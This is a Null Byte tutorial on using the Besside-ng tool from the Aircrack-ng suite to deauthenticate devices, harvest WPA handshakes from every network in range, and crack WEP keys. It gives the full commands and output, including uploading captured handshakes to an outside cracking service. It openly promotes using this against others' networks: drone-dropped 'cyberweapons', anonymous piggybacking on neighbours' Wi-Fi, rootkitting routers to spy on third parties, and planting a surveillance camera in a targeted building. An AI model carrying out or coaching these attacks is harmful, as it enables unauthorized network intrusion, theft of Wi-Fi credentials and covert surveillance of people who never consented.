Besside-ng is the hidden gem of the Aircrack-ng suite of Wi-Fi hacking tools. When run with a wireless network adapter capable of packet injection, Besside-ng can harvest WPA handshakes from any network with an active user — and crack WEP passwords outright. Unlike many tools, it requires no special dependencies and can be run via SSH, making it easy to deploy remotely.
In my opinion, it's one of the most powerful Wi-Fi hacking tools currently available. First written in 2010 in C, Besside-ng is an incredibly aggressive and persistent WPA handshake mass-harvester and WEP cracker. It features customizable options to upload handshakes to distributed WPA password crackers, which, on average, crack over 18% of networks submitted automatically.
Sound Simple? Let's Look at How It Works
Encrypted Wi-Fi networks come in two primary flavors, WEP and WPA.
While WEP can be broken easily, WPA and WPA2 networks require us to record a "handshake" when a device connects to the target network. Then, we try to guess the password by having a program try many possible passwords against that recorded handshake. If we guess the correct password, we'll know, so having a good password list and a fast processor used to be essential to cracking WPA networks.
In 2020, we have more options. To save time, we can submit these handshakes to a distributed cracking service or a more powerful machine, which will automatically try all of the world's most common and shitty passwords for us. Since many people choose bad passwords, we will get back around 10–20% of our recorded handshakes networks with cracked passwords.
To record a precious handshake from a W-Fi network, an authorized device like the target's smartphone or laptop must connect to the network. Besside-ng scans the airwaves for any devices connected to a Wi-Fi network, then injects a packet that disconnects the device from that network for a brief moment.
The targeted device will reconnect automatically, and we will record the handshake when it does. It's terrifyingly easy, and during peak activity hours in a high-density area, Besside-ng can harvest every Wi-Fi network in use within the range of your antenna. Keep in mind, if your target has an always-connected smart device, you can pretty much always grab a handshake for their network.
Why a 2010 Tool Is Still Powerful in 2020
Since 2010, some significant changes have made Besside-ng relevant again. Small, cheap computers like the Raspberry Pi Zero W and the Raspberry Pi 3 feature the ability to add powerful network adapters in addition to its internal Wi-Fi card, all while keeping the cost below $70 to run a remote headless attack suite.
So what kind of applications can we use Besside-ng for? Well, lots. But let's just go over a few of the best use-cases quickly so you get an idea.
1. Cheap Cyberweapons
Cheap, "fire-and-forget" cyberweapons, designed to harvest and crack WPA networks in a given area and then be discarded, are small and light enough to be left in an Altoids tin in the trash, dropped by a small drone on a roof, or tossed over a fence by hand. The same devices can also be used to deliberately jam or attempt to exploit the router of any nearby Wi-Fi network with a bad password.
An attacker would only need a directional antenna (like this one) aimed at the rogue device to communicate with and control it. The rapid way in which Besside-ng builds a list of available Wi-Fi connections to switch between allows a rogue device to develop a "beachhead" into the neighboring wireless environment. This doubles as a list of exploitable routers to pivot through once the WPA password is cracked. Once a rogue device is in place and cracks a few reliable networks, the hacker is free to go home and control the device via a reverse shell.
2. Anonymous Internet That Piggybacks Nearby Networks
Emergency set up of workstations when rapidly shifting locations can be aided by using Besside-ng to acquire several connection options in under an hour. A small team needing to rapidly set up an internet-connected forward operating position in an opportunistic workspace (like working out of a garage or public space) can piggyback off existing nearby infrastructure to reduce their footprint.
While it's easy to get access, it is critical to use Tor or VPNs properly, and spin the MAC address of any devices used each time they connect to such a network. If you need a network — any network — to get working, this is your program. This technique can also be used to quickly set up an environment for rogue devices to operate in, allow for a LAN dead drop between two users over a privately owned network, or impersonate users of nearby networks to mask activity.
3. Electronic Surveillance Through Router Rootkitting
Setups using kismet drones or other "flytrap-like" methods of electronic surveillance are a great way to avoid having to drop an evil Pi from a drone — or even be anywhere near your target after the initial exploit.
The opportunistic nature of Besside-ng allows it to build up a steady list of routers for a hacker to attempt to exploit. Once a router is successfully compromised, custom router firmware can convert a nearby neighbor's router into a device to spy on a third party's Wi-Fi usage or forward interesting packets. Criminals hackers even leave behind VPN endpoints in exploited routers to provide cover for committing crimes, framing the target, or charging other criminals to use the VPN network.
An Operation with Besside-ng
To show off some of the techniques above, we'll go over an applied scenario of using Besside-ng. However, you can follow along on any Kali Linux device or virtual machine.
Our training mission will be to provide Wi-Fi coverage to support an operation in a targeted building. Doing so allows the placement and operation of a small improvised rogue device called a Buck-Eye, a Kali-based Wi-Fi-connected surveillance camera running on a Raspberry Pi Zero W.
Placing a device like this allows us to do useful things like conduct visual and electronic surveillance of an area, extend VoIP coverage to places where cellular coverage may be blocked, pivot deeper into targeted systems, and perform other helpful functions.
To be controlled, the device must be connected to a Wi-Fi network. After it's placed, you can control it from your long-range connection until you can migrate it to a nearby cracked network. We'll be running Besside-ng via SSH on the Buck-Eye once it is placed to grab a nearby network password.
Since our Buck-Eye runs Kali Linux, Besside-ng can ensure tactical network availability by scanning for and helping to build a list of backdoor Wi-Fi connections to spider through to ensure survivability in the event a primary Wi-Fi connection goes down.
What You'll Need to Get Started
Besside-ng runs on Kali Linux and is particularly effective on the Raspberry Pi 3 or Pi Zero W. You'll need the Aircrack-ng suite to run the attack, and your Kali system should be updated by running apt update.
I'll be using a Raspberry Pi running Kali Linux. But the tool will work on any Kali Linux system — here are a few builds we recommend:
- On a Raspberry Pi 3 running Kali Linux, directly or via SSH.
- On a Raspberry Pi Zero W running Kali Linux.
- On a virtual machine running Kali Linux.
- On a live USB or another temporary install of Kali Linux.
Our Kali Linux build is the easiest way to get started. For hardware, the only real requirement is a wireless network adapter capable of packet injection. (It should be noted that our testing has found bugs when using the Atheros AR9271 chipset.)
Step 1: Verify You Have the Aircrack-ng Suite
In our demonstration, I will be connected to our Raspberry Pi build running Kali Linux via SSH, but this will work the same on any Kali install. First, let's make sure we have the Aircrack-ng suite updated. Type man aircrack-ng to check if it already exists on the system.
~$ man aircrack-ng
AIRCRACK-NG(1) General Commands Manual AIRCRACK-NG(1)
NAME
aircrack-ng - a 802.11 WEP / WPA-PSK key cracker
SYNOPSIS
aircrack-ng [options] <input file(s)>
DESCRIPTION
aircrack-ng is an 802.11 WEP, 802.11i WPA/WPA2, and 802.11w WPA2
key cracking program.
It can recover the WEP key once enough encrypted packets have been
captured with airodump-ng. This part of the aircrack-ng suite de‐
termines the WEP key using two fundamental methods. The first
method is via the PTW approach (Pyshkin, Tews, Weinmann). The main
advantage of the PTW approach is that very few data packets are
required to crack the WEP key. The second method is the FMS/KoreK
method. The FMS/KoreK method incorporates various statistical at‐
tacks to discover the WEP key and uses these in combination with
brute forcing.
Additionally, the program offers a dictionary method for determin‐
ing the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist
(file or stdin) or an airolib-ng has to be used.
INPUT FILES
Capture files (.cap, .pcap), IVS (.ivs) or Hashcat HCCAPX files
(.hccapx)
OPTIONS
Common options:
-a <amode>
Force the attack mode: 1 or wep for WEP (802.11) and 2 or
wpa for WPA/WPA2 PSK (802.11i and 802.11w).
-e <essid>
Select the target network based on the ESSID. This option
is also required for WPA cracking if the SSID is cloaked.
For SSID containing special characters, see
https://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spa‐
ces_double_quote_and_single_quote_etc_in_ap_names
-b <bssid> or --bssid <bssid>
Select the target network based on the access point MAC ad‐
dress.
-p <nbcpu>
Set this option to the number of CPUs to use (only avail‐
able on SMP systems) for cracking the key/passphrase. By
default, it uses all available CPUs
-q If set, no status information is displayed.
-C <macs> or --combine <macs>
Merges all those APs MAC (separated by a comma) into a vir‐
tual one.
-l <file>
Write the key into a file. Overwrites the file if it al‐
ready exists.
Static WEP cracking options:
-c Search alpha-numeric characters only.
-t Search binary coded decimal characters only.
-h Search the numeric key for Fritz!BOX
-d <mask> or --debug <mask>
Specify mask of the key. For example: A1:XX:CF
-m <maddr>
Only keep the IVs coming from packets that match this MAC
address. Alternatively, use -m ff:ff:ff:ff:ff:ff to use all
and every IVs, regardless of the network (this disables ES‐
SID and BSSID filtering).
-n <nbits>
Specify the length of the key: 64 for 40-bit WEP, 128 for
104-bit WEP, etc., until 512 bits of length. The default
value is 128.
-i <index>
Only keep the IVs that have this key index (1 to 4). The
default behavior is to ignore the key index in the packet,
and use the IV regardless.
-f <fudge>
By default, this parameter is set to 2. Use a higher value
to increase the bruteforce level: cracking will take more
time, but with a higher likelihood of success.
-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a
huge false positive that prevents the key from being found,
even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable
each attack selectively.
-x or -x0
Disable last keybytes bruteforce (not advised).
-x1 Enable last keybyte bruteforcing (default)
-x2 Enable last two keybytes bruteforcing.
-X Disable bruteforce multithreading (SMP only).
-s Shows ASCII version of the key at the right of the screen.
-y This is an experimental single brute-force attack which
should only be used when the standard attack mode fails
with more than one million IVs.
-z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Wein‐
mann) attack (default attack).
-P <num> or --ptw-debug <num>
PTW debug: 1 Disable klein, 2 PTW.
-K Use KoreK attacks instead of PTW.
-D or --wep-decloak
WEP decloak mode.
-1 or --oneshot
Run only 1 try to crack key with PTW.
-M <num>
-V or --visual-inspection
Run in visual inspection mode. Can only be used when using
KoreK.
WEP and WPA-PSK cracking options
-w <words>
Path to a dictionary file for wpa cracking. Separate file‐
names with comma when using multiple dictionaries. Specify
"-" to use stdin. Here is a list of wordlists:
https://www.aircrack-
ng.org/doku.php?id=faq#where_can_i_find_good_wordlists In
order to use a dictionary with hexadecimal values, prefix
the dictionary with "h:". Each byte in each key must be
separated by ':'. When using with WEP, key length should be
specified using -n.
-N <file> or --new-session <file>
Create a new cracking session. It allows one to interrupt
cracking session and restart at a later time (using -R or
--restore-session). Status files are saved every 5 minutes.
It does not overwrite existing session file.
-R <file> or --restore-session <file>
Restore and continue a previously saved cracking session.
This parameter is to be used alone, no other parameter
should be specified when starting aircrack-ng (all the re‐
quired information is in the session file).
WPA-PSK options:
-E <file>
Create Elcomsoft Wireless Security Auditor (EWSA) Project
file v3.02.
-j <file>
Create Hashcat v3.6+ Capture file (HCCAPX).
-J <file>
Create Hashcat Capture file (HCCAP).
-S WPA cracking speed test.
-Z <sec>
WPA cracking speed test execution length in seconds.
-r <database>
Path to the airolib-ng database. Cannot be used with '-w'.
SIMD selection:
--simd=<option>
Aircrack-ng automatically loads and uses the fastest opti‐
mization based on instructions available for your CPU. This
options allows one to force another optimization. Choices
depend on the CPU and the following are all the possibili‐
ties that may be compiled regardless of the CPU type:
generic, sse2, avx, avx2, avx512, neon, asimd, altivec,
power8.
--simd-list
Shows a list of the available SIMD architectures, separated
by a space character. Aircrack-ng automatically selects the
fastest optimization and thus it is rarely needed to use
this option. Use case would be for testing purposes or when
a "lower" optimization, such as "generic", is faster than
the automatically selected one. Before forcing a SIMD ar‐
chitecture, verify that the instruction is supported by
your CPU, using -u.
Other options:
-H or --help
Show help screen
-u or --cpu-detect
Provide information on the number of CPUs and SIMD support
AUTHOR
This manual page was written by Adam Cecile <gandalf@le-vert.net>
for the Debian system (but may be used by others). Permission is
granted to copy, distribute and/or modify this document under the
terms of the GNU General Public License, Version 2 or any later
version published by the Free Software Foundation On Debian sys‐
tems, the complete text of the GNU General Public License can be
found in /usr/share/common-licenses/GPL.
SEE ALSO
airbase-ng(8)
aireplay-ng(8)
airmon-ng(8)
airodump-ng(8)
airodump-ng-oui-update(8)
airserv-ng(8)
airtun-ng(8)
besside-ng(8)
easside-ng(8)
tkiptun-ng(8)
wesside-ng(8)
airdecap-ng(1)
airdecloak-ng(1)
airolib-ng(1)
besside-ng-crawler(1)
buddy-ng(1)
ivstools(1)
kstats(1)
makeivs-ng(1)
packetforge-ng(1)
wpaclean(1)
airventriloquist(8)
Version 1.6.0 January 2020 AIRCRACK-NG(1)
If not, or if we want to make sure it's updated, let's run the following command.
~$ sudo apt install aircrack-ng
Reading package lists... Done
Building dependency tree
Reading state information... Done
aircrack-ng is already the newest version (1:1.6-4).
aircrack-ng set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.
Once we confirm we have the suite and it's updated, we can proceed with the attack.
Step 2: Identify Your Attack Antenna & Let It Rip
On Kali Linux, you can type iwconfig to see a list of available antennas. If you are connecting to your Kali Linux device remotely via SSH or VNC, now is a great time to note which antenna is hosting your data connection (the one with the IP address assigned).
Starting Besside-ng on the wrong antenna will instantly sever your remote connection and lock you out of the device until you restart if you are connected via SSH. Here we see my attack antenna is idle while my command and control antenna is attached to a network.
~$ sudo iwconfig
wlan0 IEEE 802.11bgn ESSID:"████████████████████"
Mode:Managed Frequency:2.462 GHz Access Point: ████████████████████
Bit Rate=72 Mb/s Tx-Power=1496 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality=60/70 Signal level=50 dBm
Rx invalid nvid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
lo no wireless extensions.
eth0 no wireless extensions.
wlan1 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=1496 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
If you are not on Kali, you can run ifconfig to see attached antennas and look for "wlan" to spot the wireless antennas. In this case, wlan1 is my attack antenna.
Step 3: Configure Your Attack & Let's Ride
Besside-ng is dead simple. To learn more about it, visit it's man page.
~$ man besside-ng
BESSIDE-NG(8) System Manager's Manual BESSIDE-NG(8)
NAME
besside-ng - crack a WEP or WPA key without user intervention and
collaborate with WPA cracking statistics
SYNOPSIS
besside-ng [options] <interface>
DESCRIPTION
besside-ng is a tool which will crack all the WEP networks in
range and log all the WPA handshakes. WPA handshakes can be up‐
loaded to the online cracking service at wpa.darkircop.org.
Wpa.darkircop.com also provides useful statistics based on user-
submitted capture files about the feasibility of WPA cracking.
-b <target mac>
Specifies the target's BSSID
-s <WPA server>
Where to upload capture file for cracking. A good choice is
wpa.darkircop.org
-c <chan>
Channel lock
-p <pps>
Packages per second to send (flood rate).
-W Crack only WPA networks
-v Verbose mode. Use -vv for more verbose, -vv for even more
and so on.
-h Help screen
AUTHOR
This manual page was written by David Francos Cuartero. Permis‐
sion is granted to copy, distribute and/or modify this document
under the terms of the GNU General Public License, Version 2 or
any later version published by the Free Software Foundation On De‐
bian systems, the complete text of the GNU General Public License
can be found in /usr/share/common-licenses/GPL.
SEE ALSO
airbase-ng(8)
aireplay-ng(8)
airmon-ng(8)
airodump-ng(8)
airodump-ng-oui-update(8)
airserv-ng(8)
airtun-ng(8)
easside-ng(8)
tkiptun-ng(8)
wesside-ng(8)
aircrack-ng(1)
airdecap-ng(1)
airdecloak-ng(1)
airolib-ng(1)
besside-ng-crawler(1)
buddy-ng(1)
ivstools(1)
kstats(1)
makeivs-ng(1)
packetforge-ng(1)
wpaclean(1)
airventriloquist(8)
Version 1.6.0 January 2020 BESSIDE-NG(8)
With the attack antenna known as wlan1, simply type the following command to initiate a wide-area attack against all detected APs. While it helps to put an adapter in monitor mode, Besside-ng will take care of that.
~$ sudo besside-ng wlan1 -vv
[10:07:47] mac ██:██:██:██:██:██
[10:07:47] Let's ride
[10:07:47] Resuming from besside-ng
[10:07:47] Found AP ████████████████ [██████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [████████] chan 0 crypto WPA dbm 0
[10:07:47] Found AP ████████████████ [██████████████] chan 0 crypto WPA dbm 0
[10:07:47] Appending to wpa.cap
[10:07:47] Appemding to wep.cap
[10:07:47] Logging to besside.log
[10:07:47] Found AP ████████████████ [██████] chan 1 crypto WPA dbm -01
[10:07:47] Found AP ████████████████ [██████] chan 2 crypto WPA dbm -04
[10:07:47] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -06
[10:07:47] Found AP ████████████████ [██████████████████] chan 1 crypto WPA dbm -00
[10:07:48] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -56
[10:07:48] Found AP ████████████████ [██████████] chan 4 crypto WPA dbm -79
[10:07:49] Found AP ████████████████ [████████████] chan 7 crypto WPA dbm -50
[10:07:50] Found AP ████████████████ [████] chan 9 crypto WPA dbm -49
[10:07:50] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -83
[10:07:51] Found AP ████████████████ [██████] chan 11 crypto WPA dbm -72
[10:07:51] Found AP ████████████████ [████████] chan 1 crypto WPA dbm -59
[10:07:52] Found AP ████████████████ [████████] chan 3 crypto WPA dbm -63
[10:07:52] Found AP ████████████████ [████] chan 4 crypto WPA dbm -53
[10:07:53] Found AP ████████████████ [████████████████] chan 6 crypto WPA dbm -65
[10:07:53] Found AP ████████████████ [██████████████████████] chan 7 crypto WPA dbm -66
[10:07:54] - Scanning chan 11
Shit will proceed to hit the fan, with the script automatically throwing the wireless card into monitor mode and scanning all channels for targets. On the first run or two, you may get a "no child process" error. Just run the sudo besside-ng wlan1 command again, and it will start. To see everything the script is doing, add the -vv argument at the end. You'll see the blistering speed at which Besside-ng finds, prioritizes, pings, and attacks networks.
Step 4: Clarify the Operation During Attack Runs
In a target-rich environment, Besside-ng will run continuously for days or weeks, with my current endurance record over one week of continuous attacking. While the attack runs, it will prioritize WEP networks as they can be wholly compromised from within the script. As such, Besside-ng may focus too heavily on WEP and slow down the attack. You can prevent this by only attacking WPA networks by adding the -W argument to the command, as the help page suggests.
~$ sudo besside-ng -h
Besside-ng 1.6 - (C) 2010 Andrea Bittau
https://www.aircrack-ng.org
Usage: besside-ng [options] <interface>
Options:
-b <victim mac> : Victim BSSID
-R <victim ap regex> : Victim ESSID regex
-s <WPA server> : Upload wpa.cap for cracking
-c <chan> : chanlock
-p <pps> : flood rate
-W : WPA only
-v : verbose, -vv for more, etc.
-h : This help screen
This script will, by default, scan all channels, which makes it too slow for wardriving or null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/ to capture handshakes since, by the time the master list of APs to attack is built and prioritized, you're a block away.
This can be mitigated in part by adding the -c argument and followed by a channel number to stay locked on. Doing so builds the target list much more quickly, at the expense of only attacking one channel. Run Airodump-ng to determine the best channels to lock to.
If you wish to attack a particular network, you can add the -b argument followed by the BSSID of the target to specify which access point you want to attack. This is useful for networks with many APs under the same name (extended service sets), which may have many identically named APs that all appear as the same Wi-Fi network. Adding this argument allows you to focus your attack on a particular AP under the umbrella of the network and make faster progress on cracking a WEP key.
Step 5: Auto-Crack Passwords from WPA.cap During an Attack
Soon, you will begin to gather WPA handshakes, potentially a lot of them. They will be automatically appended to the wpa.cap file, which is created in your home directory if it doesn't already exist. WEP packets are similarly saved to a file called wep.cap, both of which can be run in Aircrack-ng to attempt to get the password.
[10:52:55] Crappy connection - ████████ unreachable got 0/10 (100% loss) [-85 dbm]
[10:53:12] Got necessary WFA handshake info for ████████
[10:53:12] Uploaded WPA handshake to wpa.darkircop.org
[10:53:12] Pwned network ████████ in 0:07 mins:secs
[10:53:12] TO-OWN [████████ ████████████████ ████████ ████ ████████████████████]
We can run these in Aircrack-ng against our own password list, but electricity is expensive, and brute-force attacks are very dull. Instead, we can use the -s argument to specify a WPA server to upload the handshakes. This will let a distributed service like wpa.darkircop.org crack the passwords for us.
Step 6: Auto-Crack Passwords from WEP.cap During an Attack
If Besside-ng detects a WEP network in range, it will cyberbully the hell out of it. You can open a second terminal window and begin attacking a WEP network while Besside-ng collects unique IVs Aircrack-ng needs to crack the network.
In a terminal, select the network to attack by typing the following. A list of all WEP captures by Besside-ng will be displayed.
~$ sudo aircrack-ng ./wep.cap
Opening /Users/████████/web.cap
Read 75862 packets.
# BSSID ESSID Encryption
1 ████████████████ ████████████████ WEP (28122 IVs)
2 ████████████████ WEP (1012 IVs)
3 ████████████████ WPA (0 handshake)
4 ████████████████ WEP (108 IVs)
5 ████████████████ WEP (4 IVs)
6 ████████████████ WPA (0 handshake)
7 ████████████████ WPA (0 handshake)
8 ████████████████ WEP (7 IVs)
9 ████████████████ WPA (0 handshake)
10 ████████████████ WEP (7 IVs)
11 ████████████████ WPA (0 handshake)
12 ████████████████ WEP (6 IVs)
13 ████████████████ ██████████████ WEP (6 IVs)
14 ████████████████ WEP (13 IVs)
15 ████████████████ ███████████████ WEP (19984 IVs)
16 ████████████████ WEP (22 IVs)
17 ████████████████ ████████████████ WEP (44 IVs)
18 ████████████████ ████████████ WEP (20240 IVs)
19 ████████████████ WEP (12 IVs)
20 ████████████████ ████████ WEP (1 IVs)
21 ████████████████ WEP (1 IVs)
22 ████████████████ ████████ WEP (749 IVs)
23 ████████████████ ████████ WEP (105 IVs)
24 ████████████████ ████████ WEP (1 IVs)
25 ████████████████ ████████████████ WEP (1578 IVs)
26 ████████████████ WEP (9 IVs)
27 ████████████████ ███████████████████ WEP (7 IVs)
28 ████████████████ ██████████████████ WEP (1 IVs)
29 ████████████████ ██████████████ WEP (2 IVs)
30 ████████████████ ████████████████ WEP (3 IVs)
31 ████████████████ ████████ WEP (3052 IVs)
32 ████████████████ ██████ WEP (4 IVs)
Index number of target networks ?
Select the number of the network Besside-ng will target, and a beautiful symphony of math ensues as Aircrack-ng attacks the encryption.
Index number of target networks ? 18
Aircrack-ng 1.2 rc4
[00:00:07] Tested 794881 keys (got 25521 IVs)
KB depth byte(vote)
0 0/ 1 21(38912) AC(34560) 5B(32768) 1F(31744) C8(31744) 0D(30976) 63(30976) 8C(30976) 82(30720) 09(30464) 69(30464) A0(30464) FC(30464)
1 2/ 3 78(32000) F5(31744) FE(30976) 06(30464) 3E(30464) 9F(30464) AC(30464) C6(30464) D2(30464) 38(30208) 43(30208) 4D(30208) 1C(22952)
2 0/ 1 FB(36352) 33(32768) 0F(32256) 37(31744) 2D(30976) DA(30720) 0D(30208) 61(30208) 9E(30208) AD(30208) C5(30208) F9(30208) 45(29952)
3 1/ 2 4D(34304) A0(32512) 18(31744) 81(30406) C7(30464) F9(30464) 87(30208) 99(30208) A6(30208) D1(30208) F1(30208) 2B(29952) 5B(29952)
4 1/ 2 37(34304) EB(32256) C5(31488) AA(30720) EE(30208) FA(30208) 4A(29952) B3(29952) A7(29696) 61(29440) D0(29184) DB(21184) ED(28928)
5 5/ 6 D4(31488) 8F(30976) EE(30720) 3C(30208) 7D(30208) C4(30208) 77(29952) B8(29952) 5A(29696) B3(29440) 1C(29184) 61(29184) 82(29184)
6 3/ 4 D5(31488) 96(30976) 2B(30208) 90(30208) 6B(30464) AB(30464) CE(30208) F0(30208) FE(30208) 1D(29696) 33(29696) 39(29696) B8(29696)
7 14/ 15 F6(30208) C3(29952) E0(29952) 4A(29696) AF(29696) 32(29440) 50(29440) 31(29184) 7A(29184) B6(29184) BE(29184) EE(29184) 2E(28928)
8 3/ 4 70(30976) 6B(30720) 47(30464) DF(30464) 1F(30208) 32(30208) 7F(30208) 9F(30208) B7(30208) 9C(29696) BF(29696) C3(29696) FF(26969)
9 0/ 1 AB(33536) 1F(31488) 23(31488) C6(31488) 6D(31232) BD(31232) D8(31232) 63(30976) 60(30720) 16(30464) 59(30464) A5(30208) 05(29952)
10 4/ 8 19(31232) 39(30976) E4(30976) FA(30976) 0F(30464) 44(30464) D3(30464) A2(30208) A6(29952) 09(29696) 25(29696) 50(29696) 54(29696)
11 2/ 3 C7(32000) E5(30976) 45(30464) 87(30464) F7(30464) E9(30208) 0B(29952) 41(29952) AD(29952) 31(29696) 42(29696) 9A(29696) D9(29696)
12 1/ 2 37(32256) FD(31744) 8E(31232) E7(30720) FA(30720) 68(30464) D1(30208) 45(29952) 4F(29952) 5D(29952) 65(29952) 09(29696) 39(29696)
Aircrack-ng will re-try the attack automatically every 5,000 IVs as more packets are captured by Besside-ng.
KB depth byte(vote)
0 7/ 8 99(5120) D4(4864) 00(4864) 8B(4864) 07(4864) FB(4864) 11(4864) 03(4608) EC(4608) 17(4608) 18(4608) E6(4608) D9(4608)
1 10/ 14 B2(4864) 6D(4608) 99(4608) 05(4608) A9(4352) 91(4352) 95(4352) B4(4352) 1B(4352) A7(4352) DC(4096) 1D(4096) FC(4096)
2 14/ 15 2D(4608) D6(4352) BD(4352) CF(4352) 0D(4352) 10(4352) 86(4352) B2(4352) B1(4352) FF(4352) 79(4096) D4(4096) 03(4096)
3 15/ 3 07(4352) 4E(4352) DB(4352) 09(4352) 58(4352) 6D(4096) 25(4096) 0F(4096) 44(4096) 8B(4096) 15(4096) 85(4096) EA(4096)
4 17/ 4 95(4352) 72(4352) CC(4352) 55(4352) C2(4096) 19(4096) 2D(4096) 2F(4096) 33(4096) FF(4096) 05(4096) 07(4096) F2(4096)
Failed. Next try with 5000 IVs.
This repeats until we defeat the encryption and gain the key.
KB depth byte(vote)
0 0/ 15 21(26112) E1(25600) F9(25088) B9(24832) BA(24576) A2(24320) 19(24320) 10(24064) 63(23808) DA(23552) 8C(23552) BD(23552) ED(23552)
1 11/ 14 BA(24064) 95(23808) 59(23808) 16(23552) 62(23552) 0A(23552) 72(23552) B7(23552) 43(23552) 68(23552) A3(23552) 9D(23552) E5(23296)
2 0/ 3 20(28416) 7A(26624) 91(25856) D4(25344) 2C(25344) DC(25088) 43(25088) 0D(24832) B3(24832) 07(24832) A7(24576) 28(24064) 9A(24064)
3 0/ 1 44(32256) 1C(25856) 82(25600) C0(25088) 2B(24832) 06(24832) 7E(24576) BF(24320) 04(24320) D6(24320) 54(24064) 31(24064) A9(24064)
4 1/ 25 00(25344) 7C(25088) 45(24832) E9(24832) 36(24832) 6C(24576) AF(24320) 25(24064) 17(23808) 3B(23808) 8C(23552) A1(23296) 4F(23296)
KEY FOUND! [ ████████████████ ] (ASCII: █████████ )
Decrypted correctly: 100%
Step 7: Troubleshoot Interruptions
Besside-ng experiences two main types of glitches — "no child process" and "network is down." These can be related to your wireless network adapter.
No child process can be fixed by re-running the Besside-ng command, most of the time. Network is down is often caused by the WPA supplicant process throwing your card out of monitor mode. To solve this problem, you can run Airmon-ng:
~$ sudo airmon-ng check kill
This will kill any troublesome processes for monitor mode, but it will also kill any other Wi-Fi interfaces, so be careful if you are SSHed into your device that way.
Besside-ng vs. Wifite
Besside-ng is not the only tool to target this niche. Suites like Wifite can also be used to attack WPA and WEP networks in automated ways. Wifite includes the added function of attacking WPS setup PINs.
While Wifite certainly provides better situational awareness of wireless targets around you, not everyone has time to wait to hit each network with every attack in the book, as Wifite likes to do. In addition, the WPS setup PIN attack is aging poorly and often no longer works, which wastes a lot of time. These attacks focus on different types of automation, with Wifite throwing everything and the kitchen sink at a particular network or networks, and Besside-ng going ham over any networks that dare exist nearby.
The problem with Wifite is that it sucks because it takes forever, and I rarely have success with it nowadays. By comparison, Besside-ng remains blisteringly fast into the foreseeable future.
Warning: Besside-ng Is Loud & Leaves a Ton of Evidence
While Besside-ng is a phenomenal tool, the nature of the attack means it interacts with every access point in range. This leaves distinctive logs in each router targeted, meaning this attack has the subtlety of running around and smacking every device off of every Wi-Fi connection in range. It can be mitigated by focusing your attack on a particular AP. The technique usually does not disrupt regular network use and operation, but can reveal your device MAC address or physical location if run against a well-defended target.
Thanks for reading, and make sure to keep an eye on Null Byte for more hacking tutorials. You can ask me questions here or on Twitter @KodyKinzie or @NullByte.
Cover photo and GIF by Kody/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!